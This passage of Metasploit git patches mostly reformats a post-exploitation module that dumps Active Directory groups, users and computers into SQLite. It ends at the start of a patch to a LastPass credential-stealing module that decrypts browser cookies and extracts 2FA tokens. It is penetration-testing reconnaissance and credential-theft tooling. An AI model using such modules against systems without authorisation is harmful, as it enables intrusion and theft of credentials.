? 1 : 0, - #Now add sAMAccountType constants - g_SAM_DOMAIN_OBJECT: (sat_int==0) ? 1 : 0, - g_SAM_GROUP_OBJECT: (sat_int==0x10000000) ? 1 : 0, - g_SAM_NON_SECURITY_GROUP_OBJECT: (sat_int==0x10000001) ? 1 : 0, - g_SAM_ALIAS_OBJECT: (sat_int==0x20000000) ? 1 : 0, - g_SAM_NON_SECURITY_ALIAS_OBJECT: (sat_int==0x20000001) ? 1 : 0, - g_SAM_NORMAL_USER_ACCOUNT: (sat_int==0x30000000) ? 1 : 0, - g_SAM_MACHINE_ACCOUNT: (sat_int==0x30000001) ? 1 : 0, - g_SAM_TRUST_ACCOUNT: (sat_int==0x30000002) ? 1 : 0, - g_SAM_APP_BASIC_GROUP: (sat_int==0x40000000) ? 1 : 0, - g_SAM_APP_QUERY_GROUP: (sat_int==0x40000001) ? 1 : 0, - g_SAM_ACCOUNT_TYPE_MAX: (sat_int==0x7fffffff) ? 1 : 0, + # Now add sAMAccountType constants + g_SAM_DOMAIN_OBJECT: (sat_int == 0) ? 1 : 0, + g_SAM_GROUP_OBJECT: (sat_int == 0x10000000) ? 1 : 0, + g_SAM_NON_SECURITY_GROUP_OBJECT: (sat_int == 0x10000001) ? 1 : 0, + g_SAM_ALIAS_OBJECT: (sat_int == 0x20000000) ? 1 : 0, + g_SAM_NON_SECURITY_ALIAS_OBJECT: (sat_int == 0x20000001) ? 1 : 0, + g_SAM_NORMAL_USER_ACCOUNT: (sat_int == 0x30000000) ? 1 : 0, + g_SAM_MACHINE_ACCOUNT: (sat_int == 0x30000001) ? 1 : 0, + g_SAM_TRUST_ACCOUNT: (sat_int == 0x30000002) ? 1 : 0, + g_SAM_APP_BASIC_GROUP: (sat_int == 0x40000000) ? 1 : 0, + g_SAM_APP_QUERY_GROUP: (sat_int == 0x40000001) ? 1 : 0, + g_SAM_ACCOUNT_TYPE_MAX: (sat_int == 0x7fffffff) ? 1 : 0 } run_sqlite_query(db, 'ad_groups', sql_param_group) @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Post user_rid = get_rid(group_user[1][:value]).to_i print_line "Group [#{individual_group[3][:value]}][#{group_rid}] has member [#{group_user[3][:value]}][#{user_rid}]" if datastore['SHOW_USERGROUPS'] - uac_int = group_user[7][:value].to_i #Set this because it is used so frequently below + uac_int = group_user[7][:value].to_i # Set this because it is used so frequently below sat_int = group_user[2][:value].to_i # Add the group to the database @@ -167,70 +167,70 @@ class Metasploit3 < Msf::Post u_comments: group_user[13][:value].to_s, u_title: group_user[14][:value].to_s, u_accountExpires: group_user[15][:value].to_i, - #Indicates that a given object has had its ACLs changed to a more secure value by the - #system because it was a member of one of the administrative groups (directly or transitively). + # Indicates that a given object has had its ACLs changed to a more secure value by the + # system because it was a member of one of the administrative groups (directly or transitively). u_adminCount: group_user[16][:value].to_i, - #The login script is executed + # The login script is executed u_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, - #The user account is disabled. + # The user account is disabled. u_ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002).zero? ? 0 : 1, - #The home directory is required. + # The home directory is required. u_ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008).zero? ? 0 : 1, - #The account is currently locked out. + # The account is currently locked out. u_ADS_UF_LOCKOUT: (uac_int & 0x00000010).zero? ? 0 : 1, - #No password is required. + # No password is required. u_ADS_UF_PASSWD_NOTREQD: (uac_int & 0x00000020).zero? ? 0 : 1, - #The user cannot change the password. + # The user cannot change the password. u_ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040).zero? ? 0 : 1, - #The user can send an encrypted password. + # The user can send an encrypted password. u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080).zero? ? 0 : 1, - #This is an account for users whose primary account is in another domain. This account - #provides user access to this domain, but not to any domain that trusts this domain. - #Also known as a local user account. + # This is an account for users whose primary account is in another domain. This account + # provides user access to this domain, but not to any domain that trusts this domain. + # Also known as a local user account. u_ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100).zero? ? 0 : 1, - #This is a default account type that represents a typical user. + # This is a default account type that represents a typical user. u_ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200).zero? ? 0 : 1, - #This is a permit to trust account for a system domain that trusts other domains. + # This is a permit to trust account for a system domain that trusts other domains. u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800).zero? ? 0 : 1, - #This is a computer account for a computer that is a member of this domain. + # This is a computer account for a computer that is a member of this domain. u_ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000).zero? ? 0 : 1, - #This is a computer account for a system backup domain controller that is a member of this domain. + # This is a computer account for a system backup domain controller that is a member of this domain. u_ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000).zero? ? 0 : 1, - #The password for this account will never expire. + # The password for this account will never expire. u_ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000).zero? ? 0 : 1, - #This is an MNS logon account. + # This is an MNS logon account. u_ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000).zero? ? 0 : 1, - #The user must log on using a smart card. + # The user must log on using a smart card. u_ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000).zero? ? 0 : 1, - #The service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. - #Any such service can impersonate a client requesting the service. + # The service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. + # Any such service can impersonate a client requesting the service. u_ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000).zero? ? 0 : 1, - #The security context of the user will not be delegated to a service even if the service - #account is set as trusted for Kerberos delegation. + # The security context of the user will not be delegated to a service even if the service + # account is set as trusted for Kerberos delegation. u_ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000).zero? ? 0 : 1, - #Restrict this principal to use only Data #Encryption Standard (DES) encryption types for keys. + # Restrict this principal to use only Data #Encryption Standard (DES) encryption types for keys. u_ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000).zero? ? 0 : 1, - #This account does not require Kerberos pre-authentication for logon. + # This account does not require Kerberos pre-authentication for logon. u_ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000).zero? ? 0 : 1, - #The password has expired + # The password has expired u_ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000).zero? ? 0 : 1, - #The account is enabled for delegation. This is a security-sensitive setting; accounts with - #this option enabled should be strictly controlled. This setting enables a service running - #under the account to assume a client identity and authenticate as that user to other remote - #servers on the network. + # The account is enabled for delegation. This is a security-sensitive setting; accounts with + # this option enabled should be strictly controlled. This setting enables a service running + # under the account to assume a client identity and authenticate as that user to other remote + # servers on the network. u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1, - #Now add sAMAccountType constants - u_SAM_DOMAIN_OBJECT: (sat_int==0) ? 1 : 0, - u_SAM_GROUP_OBJECT: (sat_int==0x10000000) ? 1 : 0, - u_SAM_NON_SECURITY_GROUP_OBJECT: (sat_int==0x10000001) ? 1 : 0, - u_SAM_ALIAS_OBJECT: (sat_int==0x20000000) ? 1 : 0, - u_SAM_NON_SECURITY_ALIAS_OBJECT: (sat_int==0x20000001) ? 1 : 0, - u_SAM_NORMAL_USER_ACCOUNT: (sat_int==0x30000000) ? 1 : 0, - u_SAM_MACHINE_ACCOUNT: (sat_int==0x30000001) ? 1 : 0, - u_SAM_TRUST_ACCOUNT: (sat_int==0x30000002) ? 1 : 0, - u_SAM_APP_BASIC_GROUP: (sat_int==0x40000000) ? 1 : 0, - u_SAM_APP_QUERY_GROUP: (sat_int==0x40000001) ? 1 : 0, - u_SAM_ACCOUNT_TYPE_MAX: (sat_int==0x7fffffff) ? 1 : 0, + # Now add sAMAccountType constants + u_SAM_DOMAIN_OBJECT: (sat_int == 0) ? 1 : 0, + u_SAM_GROUP_OBJECT: (sat_int == 0x10000000) ? 1 : 0, + u_SAM_NON_SECURITY_GROUP_OBJECT: (sat_int == 0x10000001) ? 1 : 0, + u_SAM_ALIAS_OBJECT: (sat_int == 0x20000000) ? 1 : 0, + u_SAM_NON_SECURITY_ALIAS_OBJECT: (sat_int == 0x20000001) ? 1 : 0, + u_SAM_NORMAL_USER_ACCOUNT: (sat_int == 0x30000000) ? 1 : 0, + u_SAM_MACHINE_ACCOUNT: (sat_int == 0x30000001) ? 1 : 0, + u_SAM_TRUST_ACCOUNT: (sat_int == 0x30000002) ? 1 : 0, + u_SAM_APP_BASIC_GROUP: (sat_int == 0x40000000) ? 1 : 0, + u_SAM_APP_QUERY_GROUP: (sat_int == 0x40000001) ? 1 : 0, + u_SAM_ACCOUNT_TYPE_MAX: (sat_int == 0x7fffffff) ? 1 : 0 } run_sqlite_query(db, 'ad_users', sql_param_user) @@ -239,7 +239,7 @@ class Metasploit3 < Msf::Post group_rid: group_rid } run_sqlite_query(db, 'ad_mapping', sql_param_mapping) - end + end rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e print_error("Error(Users): #{e.message}") @@ -247,111 +247,111 @@ class Metasploit3 < Msf::Post end end end - group_gather.map { |each_group| each_group.join } + group_gather.map(&:join) end vprint_status "Retrieving computers" begin computer_filter = '(objectClass=computer)' - computer_fields = ['distinguishedName', 'objectSid', 'cn','dNSHostName', 'sAMAccountType', 'sAMAccountName', 'displayName', 'logonCount', 'userAccountControl', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount', 'operatingSystem', 'operatingSystemServicePack', 'operatingSystemVersion', 'description', 'comments'] + computer_fields = ['distinguishedName', 'objectSid', 'cn', 'dNSHostName', 'sAMAccountType', 'sAMAccountName', 'displayName', 'logonCount', 'userAccountControl', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount', 'operatingSystem', 'operatingSystemServicePack', 'operatingSystemVersion', 'description', 'comments'] computers = query(computer_filter, max_search, computer_fields) - computers[:results].each do |comp| - computer_rid = get_rid(comp[1][:value]).to_i + computers[:results].each do |comp| + computer_rid = get_rid(comp[1][:value]).to_i - uac_int = comp[8][:value].to_i #Set this because it is used so frequently below - sat_int = comp[4][:value].to_i + uac_int = comp[8][:value].to_i # Set this because it is used so frequently below + sat_int = comp[4][:value].to_i - # Add the group to the database - # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx - # Note that userAccountControl is basically the same for a computer as a user; this is because a computer account is derived from a user account - # (if you look at the objectClass for a computer account, it includes 'user') and, for efficiency, we should really store it all in one - # table. However, the reality is that it will get annoying for users to have to remember to use the userAccountControl flags to work out whether - # its a user or a computer and so, for convenience and ease of use, I have put them in completely separate tables. - # Also add the sAMAccount type flags from https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637(v=vs.85).aspx - sql_param_computer = { c_rid: computer_rid, - c_distinguishedName: comp[0][:value].to_s, - c_cn: comp[2][:value].to_s, - c_dNSHostName: comp[3][:value].to_s, - c_sAMAccountType: sat_int, - c_sAMAccountName: comp[5][:value].to_s, - c_displayName: comp[6][:value].to_s, - c_logonCount: comp[7][:value].to_i, - c_userAccountControl: uac_int, - c_whenChanged: comp[9][:value].to_s, - c_whenCreated: comp[10][:value].to_s, - c_primaryGroupID: comp[11][:value].to_i, - c_badPwdCount: comp[12][:value].to_i, - c_operatingSystem: comp[13][:value].to_s, - c_operatingSystemServicePack: comp[14][:value].to_s, - c_operatingSystemVersion: comp[15][:value].to_s, - c_description: comp[16][:value].to_s, - c_comments: comp[17][:value].to_s, - #The login script is executed - c_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, - #The user account is disabled. - c_ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002).zero? ? 0 : 1, - #The home directory is required. - c_ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008).zero? ? 0 : 1, - #The account is currently locked out. - c_ADS_UF_LOCKOUT: (uac_int & 0x00000010).zero? ? 0 : 1, - #No password is required. - c_ADS_UF_PASSWD_NOTREQD: (uac_int & 0x00000020).zero? ? 0 : 1, - #The user cannot change the password. - c_ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040).zero? ? 0 : 1, - #The user can send an encrypted password. - c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080).zero? ? 0 : 1, - #This is an account for users whose primary account is in another domain. This account - #provides user access to this domain, but not to any domain that trusts this domain. - #Also known as a local user account. - c_ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100).zero? ? 0 : 1, - #This is a default account type that represents a typical user. - c_ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200).zero? ? 0 : 1, - #This is a permit to trust account for a system domain that trusts other domains. - c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800).zero? ? 0 : 1, - #This is a computer account for a computer that is a member of this domain. - c_ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000).zero? ? 0 : 1, - #This is a computer account for a system backup domain controller that is a member of this domain. - c_ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000).zero? ? 0 : 1, - #The password for this account will never expire. - c_ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000).zero? ? 0 : 1, - #This is an MNS logon account. - c_ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000).zero? ? 0 : 1, - #The user must log on using a smart card. - c_ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000).zero? ? 0 : 1, - #The service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. - #Any such service can impersonate a client requesting the service. - c_ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000).zero? ? 0 : 1, - #The security context of the user will not be delegated to a service even if the service - #account is set as trusted for Kerberos delegation. - c_ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000).zero? ? 0 : 1, - #Restrict this principal to use only Data #Encryption Standard (DES) encryption types for keys. - c_ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000).zero? ? 0 : 1, - #This account does not require Kerberos pre-authentication for logon. - c_ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000).zero? ? 0 : 1, - #The password has expired - c_ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000).zero? ? 0 : 1, - #The account is enabled for delegation. This is a security-sensitive setting; accounts with - #this option enabled should be strictly controlled. This setting enables a service running - #under the account to assume a client identity and authenticate as that user to other remote - #servers on the network. - c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1, - #Now add the sAMAccountType objects - c_SAM_DOMAIN_OBJECT: (sat_int==0) ? 1 : 0, - c_SAM_GROUP_OBJECT: (sat_int==0x10000000) ? 1 : 0, - c_SAM_NON_SECURITY_GROUP_OBJECT: (sat_int==0x10000001) ? 1 : 0, - c_SAM_ALIAS_OBJECT: (sat_int==0x20000000) ? 1 : 0, - c_SAM_NON_SECURITY_ALIAS_OBJECT: (sat_int==0x20000001) ? 1 : 0, - c_SAM_NORMAL_USER_ACCOUNT: (sat_int==0x30000000) ? 1 : 0, - c_SAM_MACHINE_ACCOUNT: (sat_int==0x30000001) ? 1 : 0, - c_SAM_TRUST_ACCOUNT: (sat_int==0x30000002) ? 1 : 0, - c_SAM_APP_BASIC_GROUP: (sat_int==0x40000000) ? 1 : 0, - c_SAM_APP_QUERY_GROUP: (sat_int==0x40000001) ? 1 : 0, - c_SAM_ACCOUNT_TYPE_MAX: (sat_int==0x7fffffff) ? 1 : 0, - } - run_sqlite_query(db, 'ad_computers', sql_param_computer) - print_line "Computer [#{sql_param_computer[:c_cn]}][#{sql_param_computer[:c_dNSHostName]}][#{sql_param_computer[:c_rid]}]" if datastore['SHOW_COMPUTERS'] - end + # Add the group to the database + # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx + # Note that userAccountControl is basically the same for a computer as a user; this is because a computer account is derived from a user account + # (if you look at the objectClass for a computer account, it includes 'user') and, for efficiency, we should really store it all in one + # table. However, the reality is that it will get annoying for users to have to remember to use the userAccountControl flags to work out whether + # its a user or a computer and so, for convenience and ease of use, I have put them in completely separate tables. + # Also add the sAMAccount type flags from https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637(v=vs.85).aspx + sql_param_computer = { c_rid: computer_rid, + c_distinguishedName: comp[0][:value].to_s, + c_cn: comp[2][:value].to_s, + c_dNSHostName: comp[3][:value].to_s, + c_sAMAccountType: sat_int, + c_sAMAccountName: comp[5][:value].to_s, + c_displayName: comp[6][:value].to_s, + c_logonCount: comp[7][:value].to_i, + c_userAccountControl: uac_int, + c_whenChanged: comp[9][:value].to_s, + c_whenCreated: comp[10][:value].to_s, + c_primaryGroupID: comp[11][:value].to_i, + c_badPwdCount: comp[12][:value].to_i, + c_operatingSystem: comp[13][:value].to_s, + c_operatingSystemServicePack: comp[14][:value].to_s, + c_operatingSystemVersion: comp[15][:value].to_s, + c_description: comp[16][:value].to_s, + c_comments: comp[17][:value].to_s, + # The login script is executed + c_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, + # The user account is disabled. + c_ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002).zero? ? 0 : 1, + # The home directory is required. + c_ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008).zero? ? 0 : 1, + # The account is currently locked out. + c_ADS_UF_LOCKOUT: (uac_int & 0x00000010).zero? ? 0 : 1, + # No password is required. + c_ADS_UF_PASSWD_NOTREQD: (uac_int & 0x00000020).zero? ? 0 : 1, + # The user cannot change the password. + c_ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040).zero? ? 0 : 1, + # The user can send an encrypted password. + c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080).zero? ? 0 : 1, + # This is an account for users whose primary account is in another domain. This account + # provides user access to this domain, but not to any domain that trusts this domain. + # Also known as a local user account. + c_ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100).zero? ? 0 : 1, + # This is a default account type that represents a typical user. + c_ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200).zero? ? 0 : 1, + # This is a permit to trust account for a system domain that trusts other domains. + c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800).zero? ? 0 : 1, + # This is a computer account for a computer that is a member of this domain. + c_ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000).zero? ? 0 : 1, + # This is a computer account for a system backup domain controller that is a member of this domain. + c_ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000).zero? ? 0 : 1, + # The password for this account will never expire. + c_ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000).zero? ? 0 : 1, + # This is an MNS logon account. + c_ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000).zero? ? 0 : 1, + # The user must log on using a smart card. + c_ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000).zero? ? 0 : 1, + # The service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. + # Any such service can impersonate a client requesting the service. + c_ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000).zero? ? 0 : 1, + # The security context of the user will not be delegated to a service even if the service + # account is set as trusted for Kerberos delegation. + c_ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000).zero? ? 0 : 1, + # Restrict this principal to use only Data #Encryption Standard (DES) encryption types for keys. + c_ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000).zero? ? 0 : 1, + # This account does not require Kerberos pre-authentication for logon. + c_ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000).zero? ? 0 : 1, + # The password has expired + c_ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000).zero? ? 0 : 1, + # The account is enabled for delegation. This is a security-sensitive setting; accounts with + # this option enabled should be strictly controlled. This setting enables a service running + # under the account to assume a client identity and authenticate as that user to other remote + # servers on the network. + c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1, + # Now add the sAMAccountType objects + c_SAM_DOMAIN_OBJECT: (sat_int == 0) ? 1 : 0, + c_SAM_GROUP_OBJECT: (sat_int == 0x10000000) ? 1 : 0, + c_SAM_NON_SECURITY_GROUP_OBJECT: (sat_int == 0x10000001) ? 1 : 0, + c_SAM_ALIAS_OBJECT: (sat_int == 0x20000000) ? 1 : 0, + c_SAM_NON_SECURITY_ALIAS_OBJECT: (sat_int == 0x20000001) ? 1 : 0, + c_SAM_NORMAL_USER_ACCOUNT: (sat_int == 0x30000000) ? 1 : 0, + c_SAM_MACHINE_ACCOUNT: (sat_int == 0x30000001) ? 1 : 0, + c_SAM_TRUST_ACCOUNT: (sat_int == 0x30000002) ? 1 : 0, + c_SAM_APP_BASIC_GROUP: (sat_int == 0x40000000) ? 1 : 0, + c_SAM_APP_QUERY_GROUP: (sat_int == 0x40000001) ? 1 : 0, + c_SAM_ACCOUNT_TYPE_MAX: (sat_int == 0x7fffffff) ? 1 : 0 + } + run_sqlite_query(db, 'ad_computers', sql_param_computer) + print_line "Computer [#{sql_param_computer[:c_cn]}][#{sql_param_computer[:c_dNSHostName]}][#{sql_param_computer[:c_rid]}]" if datastore['SHOW_COMPUTERS'] + end rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e print_error("Error(Computers): #{e.message}") @@ -363,7 +363,6 @@ class Metasploit3 < Msf::Post f = ::File.size(dbfile.to_s) print_status "Database closed: #{dbfile} at #{f} byte(s)" end - end # Run the parameterised SQL query @@ -551,6 +550,6 @@ class Metasploit3 < Msf::Post def get_rid(data) sid = data.unpack("bbbbbbbbV*")[8..-1] - return sid[-1] + sid[-1] end end From 2301658611e8f875a417a4610df6fbaddbc61c76 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sun, 20 Dec 2015 02:20:59 +0000 Subject: [PATCH 123/686] Working --- .../windows/gather/ad_groupusers_to_sql.rb | 54 +++++++++---------- 1 file changed, 27 insertions(+), 27 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 8acb6101fb..a5ff303bb9 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -97,15 +97,15 @@ class Metasploit3 < Msf::Post # Add the group to the database # groupType parameter interpretation: https://msdn.microsoft.com/en-us/library/windows/desktop/ms675935(v=vs.85).aspx sql_param_group = { g_rid: group_rid, - g_distinguishedName: individual_group[0][:value].to_s, + g_distinguishedName: individual_group[0][:value].encode('UTF-8'), g_sAMAccountType: sat_int, - g_sAMAccountName: individual_group[3][:value].to_s, - g_whenChanged: individual_group[4][:value].to_s, - g_whenCreated: individual_group[5][:value].to_s, - g_description: individual_group[6][:value].to_s, + g_sAMAccountName: individual_group[3][:value].encode('UTF-8'), + g_whenChanged: individual_group[4][:value].encode('UTF-8'), + g_whenCreated: individual_group[5][:value].encode('UTF-8'), + g_description: individual_group[6][:value].encode('UTF-8'), g_groupType: grouptype_int, g_adminCount: individual_group[8][:value].to_i, - g_comments: individual_group[9][:value].to_s, + g_comments: individual_group[9][:value].encode('UTF-8'), # Specifies a group that is created by the system. g_GT_GROUP_CREATED_BY_SYSTEM: (grouptype_int & 0x00000001).zero? ? 0 : 1, # Specifies a group with global scope. @@ -152,20 +152,20 @@ class Metasploit3 < Msf::Post # Add the group to the database # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx sql_param_user = { u_rid: user_rid, - u_distinguishedName: group_user[0][:value].to_s, + u_distinguishedName: group_user[0][:value].encode('UTF-8'), u_sAMAccountType: group_user[2][:value].to_i, - u_sAMAccountName: group_user[3][:value].to_s, - u_displayName: group_user[4][:value].to_s, - u_description: group_user[5][:value].to_s, + u_sAMAccountName: group_user[3][:value].encode('UTF-8'), + u_displayName: group_user[4][:value].encode('UTF-8'), + u_description: group_user[5][:value].encode('UTF-8'), u_logonCount: group_user[6][:value].to_i, u_userAccountControl: uac_int, - u_userPrincipalName: group_user[8][:value].to_s, - u_whenChanged: group_user[9][:value].to_s, - u_whenCreated: group_user[10][:value].to_s, + u_userPrincipalName: group_user[8][:value].encode('UTF-8'), + u_whenChanged: group_user[9][:value].encode('UTF-8'), + u_whenCreated: group_user[10][:value].encode('UTF-8'), u_primaryGroupID: group_user[11][:value].to_i, u_badPwdCount: group_user[12][:value].to_i, - u_comments: group_user[13][:value].to_s, - u_title: group_user[14][:value].to_s, + u_comments: group_user[13][:value].encode('UTF-8'), + u_title: group_user[14][:value].encode('UTF-8'), u_accountExpires: group_user[15][:value].to_i, # Indicates that a given object has had its ACLs changed to a more secure value by the # system because it was a member of one of the administrative groups (directly or transitively). @@ -270,23 +270,23 @@ class Metasploit3 < Msf::Post # its a user or a computer and so, for convenience and ease of use, I have put them in completely separate tables. # Also add the sAMAccount type flags from https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637(v=vs.85).aspx sql_param_computer = { c_rid: computer_rid, - c_distinguishedName: comp[0][:value].to_s, - c_cn: comp[2][:value].to_s, - c_dNSHostName: comp[3][:value].to_s, + c_distinguishedName: comp[0][:value].encode('UTF-8'), + c_cn: comp[2][:value].encode('UTF-8'), + c_dNSHostName: comp[3][:value].encode('UTF-8'), c_sAMAccountType: sat_int, - c_sAMAccountName: comp[5][:value].to_s, - c_displayName: comp[6][:value].to_s, + c_sAMAccountName: comp[5][:value].encode('UTF-8'), + c_displayName: comp[6][:value].encode('UTF-8'), c_logonCount: comp[7][:value].to_i, c_userAccountControl: uac_int, - c_whenChanged: comp[9][:value].to_s, - c_whenCreated: comp[10][:value].to_s, + c_whenChanged: comp[9][:value].encode('UTF-8'), + c_whenCreated: comp[10][:value].encode('UTF-8'), c_primaryGroupID: comp[11][:value].to_i, c_badPwdCount: comp[12][:value].to_i, - c_operatingSystem: comp[13][:value].to_s, - c_operatingSystemServicePack: comp[14][:value].to_s, - c_operatingSystemVersion: comp[15][:value].to_s, - c_description: comp[16][:value].to_s, - c_comments: comp[17][:value].to_s, + c_operatingSystem: comp[13][:value].encode('UTF-8'), + c_operatingSystemServicePack: comp[14][:value].encode('UTF-8'), + c_operatingSystemVersion: comp[15][:value].encode('UTF-8'), + c_description: comp[16][:value].encode('UTF-8'), + c_comments: comp[17][:value].encode('UTF-8'), # The login script is executed c_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, # The user account is disabled. From c11c0ca7e0544d7f0cc7c9b4595b62f6a3b473e3 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sun, 20 Dec 2015 02:35:19 +0000 Subject: [PATCH 124/686] Added comment about the UTF-8 encoding. This is an issue which is documented at https://github.com/rails/rails/issues/1965; namely that SQLite seems to treat ASCII text as a blob meaning that the text searches break. Encoding to UTF-8 seems to fix this. --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index a5ff303bb9..b4835baf4c 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -96,6 +96,8 @@ class Metasploit3 < Msf::Post # Add the group to the database # groupType parameter interpretation: https://msdn.microsoft.com/en-us/library/windows/desktop/ms675935(v=vs.85).aspx + # Note that the conversions to UTF-8 are necessary because of the way SQLite detects column type affinity + # Turns out that the 'fix' is documented in https://github.com/rails/rails/issues/1965 sql_param_group = { g_rid: group_rid, g_distinguishedName: individual_group[0][:value].encode('UTF-8'), g_sAMAccountType: sat_int, From 3a89d3cc709386c9ffb3c2452121d222bdb3a31e Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sun, 20 Dec 2015 02:37:25 +0000 Subject: [PATCH 125/686] Turns out that we dont need the report or accounts includes in there, so removing them for tidyness --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index b4835baf4c..24c4b75aa3 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -8,9 +8,7 @@ require 'msf/core' require 'sqlite3' class Metasploit3 < Msf::Post - include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP - include Msf::Post::Windows::Accounts def initialize(info = {}) super(update_info( From ab630166bb58a393b369df2371fb0df5a45e2367 Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Sat, 19 Dec 2015 21:40:30 -0800 Subject: [PATCH 126/686] Decrypt Chrome and Opera cookies and msdftify code --- modules/post/multi/gather/lastpass_creds.rb | 206 ++++++++++---------- 1 file changed, 108 insertions(+), 98 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index 66ef12231c..14c1d2d591 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Post print_status "Extracting 2FA tokens" extract_2fa_tokens(account_map) - print_status "Extracting vault and iterations" + print_status "Extracting vault and iterations" 